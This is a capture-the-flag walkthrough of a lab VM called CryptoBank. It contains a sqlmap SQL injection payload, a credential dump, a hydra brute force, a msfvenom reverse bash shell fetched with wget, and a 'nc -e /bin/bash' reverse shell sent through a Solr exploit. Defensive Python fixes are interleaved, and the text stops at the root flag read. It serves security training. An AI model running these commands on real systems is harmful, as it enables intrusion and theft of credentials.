Welcome to CryptoBank, the best Crypto platform to store and trade your crypto assets, join now! Our platform uses advanced technology to protect your assets. Our experienced engineers have taken extra measures to keep our infrastructure secure.
Goal: Hack the CryptoBank in order to reach their cold Bitcoin wallet (root flag)
1. Reconnaissance
Scanning the network to find the vulnerable machine's IP address
We find the IP of the vulnerable machine to be 192.168.10.24
Adding the hostname cryptobank.local to the /etc/hosts file so that it resolves to this IP address. The hostname can be found by opening the web page and proceeding to the secure login page, which shows an error because the host name could not be resolved.
2. Scanning
2.1 Nmap
Using nmap to find the open ports and their services
nmap -sV -Pn -p- -A -oA nmap/inital 192.168.10.24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-12 09:49 IST
Nmap scan report for 192.168.10.24
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:4e:59:df:b7:55:49:cf:d3:12:2d:19:01:05:43:f7 (RSA)
| 256 5e:1b:37:98:ab:c7:e6:ee:5f:f8:df:43:14:de:28:4e (ECDSA)
|_ 256 8e:a9:90:9f:6e:51:b1:c7:26:ea:07:ac:69:28:b3:1c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: CryptoBank
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:26:22:ED (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 39.51 ms 192.168.10.24
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.50 seconds
We find tcp ports 22 and 80 open with ssh and Apache running respectively.
/trade: we see a login page for a trading platform
In order to access this page, we need to be authenticated
2.3 Vulnerability scanning
Using nikto to scan for vulnerabilities or exposed sensitive information
nikto -url http://192.168.10.24
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.10.24
+ Target Hostname: 192.168.10.24
+ Target Port: 80
+ Start Time: 2022-04-12 10:00:49 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 82f7, size: 5a30acd90b6ab, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnakes list (https://gist.github.com/mubix/5d269c686584875015a2)
+ 8260 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2022-04-12 10:03:19 (GMT5.5) (150 seconds)
---------------------------------------------------------------------------
We find an info.php page which exposes the details of the PHP installation, including its version, which is always good to know.
2.4 SQL injection vulnerability
We can use Burp Suite Pro to crawl and scan cryptobank.local/trade for vulnerabilities
We find that the login page is vulnerable to SQL injection
We capture the login request in Burp Suite and save it as a text file, request.txt, for later enumeration with sqlmap
2.5 Credential dumping
Since cryptobank.local/trade is vulnerable to SQL injection, we can use sqlmap to dump potential credentials
Getting the database names:
sqlmap -r request.txt --dbs --batch
[*] starting @ 10:35:58 /2022-04-12/
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:36:33] [INFO] the back-end DBMS is MySQL
[10:36:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:36:33] [INFO] fetching database names
[10:36:33] [INFO] fetching number of databases
[10:36:33] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
5
[10:36:44] [INFO] retrieved:
[10:36:49] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[10:37:52] [INFO] retrieved: cryptobank
[10:38:29] [INFO] retrieved: mysql
[10:38:47] [INFO] retrieved: performanceU
[10:39:31] [INFO] retrieved:
[10:39:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
available databases [4]:
[*] cryptobank
[*] information_schema
[*] mysql
[*] performanceU
We get 4 databases: cryptobank, information_schema, mysql and performanceU
Of these, the most interesting and most likely to hold credentials is cryptobank
Dumping the tables in cryptobank:
sqlmap -r request.txt -D cryptobank --tables --batch
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:41:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:41:43] [INFO] fetching tables for database: 'cryptobank'
[10:41:43] [INFO] fetching number of tables for database 'cryptobank'
[10:41:43] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[10:41:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:42:00] [INFO] adjusting time delay to 1 second due to good response times
3
[10:42:00] [INFO] retrieved: accounts
[10:42:29] [INFO] retrieved: comments
[10:42:57] [INFO] retrieved: loans
Database: cryptobank
[3 tables]
+----------+
| accounts |
| comments |
| loans |
+----------+
We get the table names accounts, comments and loans, of which accounts is the most likely to hold credentials
Getting the columns of the table accounts:
sqlmap -r request.txt -T accounts -D cryptobank --columns --batch
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:45:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:45:16] [INFO] fetching columns for table 'accounts' in database 'cryptobank'
[10:45:16] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
===================================================================================
Database: cryptobank
Table: accounts
[4 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| balance | int(11) |
| id_account | int(11) |
| password | varchar(100) |
| username | varchar(50) |
+------------+--------------+
We get 4 columns: balance, id_account, password and username
Dumping the data from the username and password columns:
sqlmap -r request.txt -T accounts -D cryptobank -C username,password --dump
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:51:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:51:04] [INFO] fetching entries of column(s) 'password,username' for table 'accounts' in database 'cryptobank'
[10:51:04] [INFO] fetching number of column(s) 'password,username' entries for table 'accounts' in database 'cryptobank'
[10:51:04] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[10:51:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
===================================================================================
Database: cryptobank
Table: accounts
[12 entries]
+--------------------+------------+
| username | password |
+--------------------+------------+
| spongebob | 3mwZd896Me |
| bill.w | 3Nrc2FYJMe |
| deadbeef | 6X7DnLF5pG |
| dreadpirateroberts | 7HwAEChFP9 |
| notanirsagent | 8hPx2Zqn4b |
| williamdelisle | gFG7pqE5cn |
| buzzlightyear | LnBHvEhmw3 |
| mrbitcoin | LxZjkK87nu |
| johndl33t | NqRF4W85yf |
| juliusthedeveloper | wJWm4CgV26 |
| patric | x8CRvHqgPp |
| tim | zm2gBcaxd3 |
+--------------------+------------+
Saving the usernames and passwords in the files users.txt and passwords.txt respectively
On further exploration of cryptobank.local, we get more potential usernames from the core team section by clicking the email icon below each team member. We add these to users.txt too.
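As an added defensive example (not code from the CryptoBank VM or this write-up), the following Python shows the two fixes that would have stopped this stage: a parameterised login query instead of string concatenation, and salted PBKDF2 hashes instead of the plaintext values in accounts.password. It uses sqlite3 in memory as a stand-in for the VM's MySQL backend; the sample rows are taken from the dump above and the column width is widened to fit the encoded hash.

```python
import hashlib
import hmac
import os
import sqlite3

# Added defensive example; not code from the CryptoBank VM or the write-up.
# The dumped accounts table shows two weaknesses at once: the login query was
# built by string concatenation (which sqlmap's time-based blind payload
# exploited) and passwords were stored in plaintext, so a single injection
# yielded twelve reusable credentials. sqlite3 stands in for MySQL here.

# Constructed sample rows, copied from the dumped table above.
SAMPLE_ACCOUNTS = [("spongebob", "3mwZd896Me"), ("tim", "zm2gBcaxd3")]

# sqlmap's payload from the write-up. SLEEP() is MySQL-only; what matters here
# is that its quote and AND rewrite the statement when spliced in as text.
SQLMAP_PAYLOAD = "1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy"

PBKDF2_ITERATIONS = 600_000  # OWASP's current figure for PBKDF2-HMAC-SHA256


def vulnerable_query(user, pw):
    """The concatenation pattern behind the /trade login. Returns the SQL text
    that would reach MySQL so the structural change can be inspected safely."""
    return ("SELECT id_account FROM accounts "
            "WHERE username='%s' AND password='%s'" % (user, pw))


def hash_password(pw, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as 'iterations$salt_hex$digest_hex'."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ITERATIONS)
    return "%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())


def verify_password(pw, stored):
    iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison so timing does not leak how many bytes matched.
    return hmac.compare_digest(candidate.hex(), digest_hex)


def build_db(accounts):
    """Same columns as the dumped table; password is widened from the VM's
    varchar(100) to hold the encoded hash, and never the plaintext."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id_account INTEGER PRIMARY KEY, "
                 "username VARCHAR(50) UNIQUE, password VARCHAR(128), "
                 "balance INTEGER DEFAULT 0)")
    for name, pw in accounts:
        conn.execute("INSERT INTO accounts (username, password) VALUES (?, ?)",
                     (name, hash_password(pw)))
    return conn


def safe_login(conn, user, pw):
    """Parameterised lookup: `user` travels as a bound value, never as SQL, and
    the password is checked against the hash instead of compared in the query."""
    row = conn.execute("SELECT password FROM accounts WHERE username = ?",
                       (user,)).fetchone()
    return row is not None and verify_password(pw, row[0])
```

With this schema the same sqlmap dump would have produced hashes rather than the reusable passwords that the hydra step below relies on.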
2.6 Brute-forcing login credentials
Using hydra with the obtained credentials to brute-force the /development login portal.
hydra -L users.txt -P passwords.txt http-get://192.168.10.24/development
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-12 11:01:29
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:4/p:1), ~1 try per task
[DATA] attacking http-get://192.168.10.24:80/development
[80][http-get] host: 192.168.10.24 login: julius.b password: wJWm4CgV26
1 of 1 target successfully completed, 1 valid password found
We get the credentials julius.b : wJWm4CgV26
2.7 Recursive directory scanning
We can use dirb to recursively find directories under /development. Since it requires authentication, we need to pass the credentials along with it.
dirb http://192.168.10.24/development/ /usr/share/dirb/wordlists/common.txt -u julius.b:wJWm4CgV26 -w
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Apr 12 19:10:29 2022
URL_BASE: http://192.168.10.24/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
AUTHORIZATION: julius.b:wJWm4CgV26
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.24/development/ ----
==> DIRECTORY: http://192.168.10.24/development/backups/
+ http://192.168.10.24/development/index.html (CODE:200|SIZE:21)
+ http://192.168.10.24/development/php.ini (CODE:200|SIZE:109)
==> DIRECTORY: http://192.168.10.24/development/tools/
---- Entering directory: http://192.168.10.24/development/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.10.24/development/backups/.htaccess (CODE:200|SIZE:12)
==> DIRECTORY: http://192.168.10.24/development/backups/home/
---- Entering directory: http://192.168.10.24/development/tools/ ----
+ http://192.168.10.24/development/tools/index.php (CODE:403|SIZE:688)
==> DIRECTORY: http://192.168.10.24/development/tools/Resources/
---- Entering directory: http://192.168.10.24/development/backups/home/ ----
+ http://192.168.10.24/development/backups/home/.git/HEAD (CODE:200|SIZE:23)
+ http://192.168.10.24/development/backups/home/.htaccess (CODE:200|SIZE:12)
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/
+ http://192.168.10.24/development/backups/home/index.html (CODE:200|SIZE:33603)
==> DIRECTORY: http://192.168.10.24/development/backups/home/trade/
---- Entering directory: http://192.168.10.24/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/css/
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/fonts/
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/img/
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/js/
---- Entering directory: http://192.168.10.24/development/backups/home/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.10.24/development/backups/home/development/.htaccess (CODE:200|SIZE:154)
+ http://192.168.10.24/development/backups/home/development/php.ini (CODE:200|SIZE:109)
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/tools/
---- Entering directory: http://192.168.10.24/development/backups/home/trade/ ----
+ http://192.168.10.24/development/backups/home/trade/index.php (CODE:403|SIZE:688)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/development/tools/ ----
+ http://192.168.10.24/development/backups/home/development/tools/index.php (CODE:403|SIZE:688)
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/tools/Resources/
---- Entering directory: http://192.168.10.24/development/backups/home/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Apr 12 19:12:35 2022
DOWNLOADED: 64568 - FOUND: 11
Reading the contents of development/backups/home/development/php.ini, we can see that a firewall called NinjaFirewall is active, which might block reverse-shell uploads. We need to find a way to execute commands directly.
We also find a directory called .git under /development/backups/home, which could be a copy of the site's git repository and might contain useful information.
2.8 Rebuilding the git repository
Cloning GitHack from its GitHub repository and running it against the exposed /.git path
git clone https://github.com/lijiejie/GitHack
cd GitHack
python3 GitHack.py http://192.168.10.24/development/backups/home/.git/
Searching the recovered files for anything interesting
ls
192.168.10.24 GitHack.py index lib README.md
cd 192.168.10.24
ls
assets closed.html development dev-notes.txt index.html index.js ninjacheck.php ninjafirewall style.css trade
cd development
ls
php.ini tools
cd tools
ls
CommandExecution FileInclusion FileUpload homepage.html index.php Resources
cd CommandExecution
ls
commandexec.html CommandExec.php
We get a file named CommandExec.php which contains the login configuration
From its code, the username field of /development/tools/CommandExecution/CommandExec.php is vulnerable to command injection once the request is validated with the same password, wJWm4CgV26
3. Initial Foothold
Navigating to the homepage of /tools (http://cryptobank.local/development/tools/homepage.html), we can see three useful sections.
Since there is a firewall sitting in front of the application, the most probable way of getting a reverse shell is command execution. We proceed with the Execute a command section.
Using the Run system command option
Testing the vulnerability by entering ls (or any other command with visible output) in the username field and the password wJWm4CgV26
We find that we can execute commands through the Username field
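As an added defensive example (not code from the CryptoBank VM or this write-up), this is how a "Run system command" page can execute a tool without handing the request field to a shell, which is the defect that lets ls, wget and bash run as www-data above. It is Python rather than the page's PHP, and the allowlist, the command names and the SHELL_META set are assumptions of this example.

```python
import subprocess

# Added defensive example; not code from the CryptoBank VM or the write-up.
# CommandExec.php handed the Username field to a shell once the fixed password
# matched, so `ls`, `wget http://HOSTIP:8000/reverse.sh` and `bash reverse.sh`
# all ran as www-data. The pattern below keeps user input out of /bin/sh:
# an allowlist of programs, fixed argv prefixes, and no shell=True.

# Hypothetical allowlist: what an admin "tools" page may run, as fixed argv.
ALLOWED_COMMANDS = {
    "whoami": ["whoami"],
    "disk": ["df", "-h"],
    "echo": ["echo"],
}

# Characters that mean something to a shell. They are inert once we bypass the
# shell, but refusing them gives a clean log signal at no cost to real input.
SHELL_META = set(";|&$`<>()\n\\'\"")


def validate_request(command, argument=""):
    """Maps a (command, argument) request to an argv list, or refuses it.
    Returns (argv, reason); argv is None when the request is refused."""
    if command not in ALLOWED_COMMANDS:
        return None, "command '%s' not in allowlist" % command
    if any(ch in SHELL_META for ch in argument):
        return None, "shell metacharacter in argument"
    argv = list(ALLOWED_COMMANDS[command])
    if argument:
        argv.append(argument)  # one argv element, however many spaces it has
    return argv, "ok"


def run_tool(command, argument=""):
    """Executes an allowlisted tool without a shell and returns a result dict."""
    argv, reason = validate_request(command, argument)
    if argv is None:
        return {"ran": False, "reason": reason}
    # argv goes straight to execve. Even without the metacharacter check, a `;`
    # or `$(...)` inside `argument` would reach the program as literal text and
    # never be interpreted by /bin/sh, because no shell is involved.
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return {"ran": True, "exit": proc.returncode, "output": proc.stdout}
```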
3.1 Crafting payload
Crafting a bash reverse shell with msfvenom, using the payload cmd/unix/reverse_bash, and saving it as reverse.sh
msfvenom -p cmd/unix/reverse_bash LHOST=HOSTIP LPORT=4444 R> reverse.sh
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes
Hosting the payload locally using a Python web server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Fetching the payload onto the target by entering wget http://HOSTIP:8000/reverse.sh in the Username field
3.2 Reverse shell
Firing up msfconsole and selecting the module exploit/multi/handler to catch our reverse shell.
Setting the payload to cmd/unix/reverse_bash, the same one we used to craft the payload with msfvenom
Setting LHOST and LPORT (default is 4444) and running it
msfconsole
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST eth0
LHOST => eth0
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run
[*] Started reverse TCP handler on 192.168.10.22:4444
Since we already uploaded the payload to the target, we need to run it.
Executing the payload by running bash reverse.sh
We get an open metasploit command shell.
[*] Command shell session 1 opened (192.168.10.22:4444 -> 192.168.10.24:50118 ) at 2022-04-13 10:21:54 +0530
whoami
www-data
We are the user www-data
Backgrounding session 1 with Ctrl + Z
Upgrading the shell to a Meterpreter session with sessions -u 1
We get a stable Meterpreter shell as session 2 and interact with it using sessions -i 2
^Z
Background session 1? [y/N] y
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.10.22:4433
[*] Sending stage (989032 bytes) to 192.168.10.24
[*] Meterpreter session 2 opened (192.168.10.22:4433 -> 192.168.10.24:57458 ) at 2022-04-13 10:22:20 +0530
[*] Command stager progress: 100.00% (773/773 bytes)
[msf](Jobs:0 Agents:2) exploit(multi/handler) >> sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.10.22:4444 -> 192.168.10.24:50118 (192.168.10.24)
2 meterpreter x86/linux www-data @ 192.168.10.24 192.168.10.22:4433 -> 192.168.10.24:57458 (192.168.10.24)
[msf](Jobs:0 Agents:2) exploit(multi/handler) >> sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(/var/www/cryptobank/development/tools/CommandExecution) >
4. Pivoting
After gaining the Meterpreter session, we can run netstat to discover any other connections from the application.
Starting a netcat listener on port 7777 in a new terminal window
nc -lvnp 7777
listening on [any] 7777 ...
Executing the exploit (47572.py) against the IP address and port on which the Apache Solr service is running, using netcat for the reverse connection
www-data@cryptobank:/tmp$ python3 47572.py 172.17.0.1 8983 "nc -e /bin/bash 192.168.10.22 7777"
OS Realese: Linux, OS Version: 4.15.0-175-generic
if remote exec failed, you should change your command with right os platform
Init node cryptobank Successfully, exec command=nc -e /bin/bash 192.168.10.22 7777
RCE failed @Apache Solr node cryptobank
www-data@cryptobank:/tmp$
We get a connection to our listener; stabilizing the shell with a pty.
nc -lvnp 7777
listening on [any] 7777 ...
connect to [192.168.10.22] from (UNKNOWN) [192.168.10.24] 44906
python -c 'import pty;pty.spawn("/bin/bash")'
solr@33fa86e6105f:/opt/solr/server$
5. Privilege Escalation
Using sudo -l, we find out that user solr can run all commands as root
solr@33fa86e6105f:/opt/solr/server$ sudo -l
Matching Defaults entries for solr on 33fa86e6105f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User solr may run the following commands on 33fa86e6105f:
(ALL) NOPASSWD: ALL
(ALL : ALL) ALL
Escalating privileges with sudo su and reading flag.txt in /root. Although a NOPASSWD entry is listed, the later (ALL : ALL) ALL rule is the last match and takes precedence, so sudo still asks for a password; the default password of the solr user, solr, works.
solr@33fa86e6105f:/opt/solr/server$ sudo su
[sudo] password for solr: solr
root@33fa86e6105f:/opt/solr-8.1.1/server# cd /root
root@33fa86e6105f:~# cat flag.txt